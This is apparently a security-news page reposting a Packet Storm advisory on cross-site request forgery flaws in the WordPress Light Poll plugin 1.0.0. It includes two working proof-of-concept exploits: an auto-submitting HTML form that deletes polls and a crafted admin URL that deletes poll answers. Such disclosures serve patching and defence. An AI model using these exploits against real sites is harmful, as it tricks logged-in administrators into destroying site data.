Security
Headlines
HeadlinesLatestCVEs

Headline

WordPress Light Poll 1.0.0 Cross Site Request Forgery

WordPress Light Poll plugin versions 1.0.0 and below suffer from multiple cross site request forgery vulnerabilities.

Packet Storm
#csrf#vulnerability#wordpress#php#auth#firefox
# Exploit Title: Light Poll <= 1.0.0 - Polls Deletion via CSRF# Date: 05-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/light-poll/# Version: <=1.0.0# Tested on: Firefox# Contact me: [email protected] plugin does not have CSRF checks when deleting polls, which could allowattackers to make logged in users perform such action via a CSRF attackProof of Concept<html>  <body>    <form action="http://localhost/wp-admin/admin.php">      <input type="hidden" name="page" value="lp_settings" />      <input type="hidden" name="task" value="remove" />      <input type="hidden" name="id" value="1" />      <input type="submit" value="Submit request" />    </form>    <script>      history.pushState('', '', '/');      document.forms[0].submit();    </script>  </body></html>Reference:https://wpscan.com/vulnerability/d598eabd-a87a-4e3e-be46-a5c5cc3f130e/# Exploit Title: Light Poll <= 1.0.0 - Poll Answers Deletion via CSRF# Date: 05-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/light-poll/# Version: <=1.0.0# Tested on: Firefox# Contact me: [email protected] plugin does not have CSRF checks in some places, which could allowattackers to make logged in users perform unwanted actions via CSRF attacksProof of ConceptWhere <<POLL_ID>> and <<ANSWER_ID>> are valid:https://example.com/wp-admin/admin.php?page=poll_settings&task=remove_answer&id=<<POLL_ID>>&answer_id=<<ANSWER_ID>>Reference:https://wpscan.com/vulnerability/d1449be1-ae85-46f4-b5ba-390d25b87723/

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution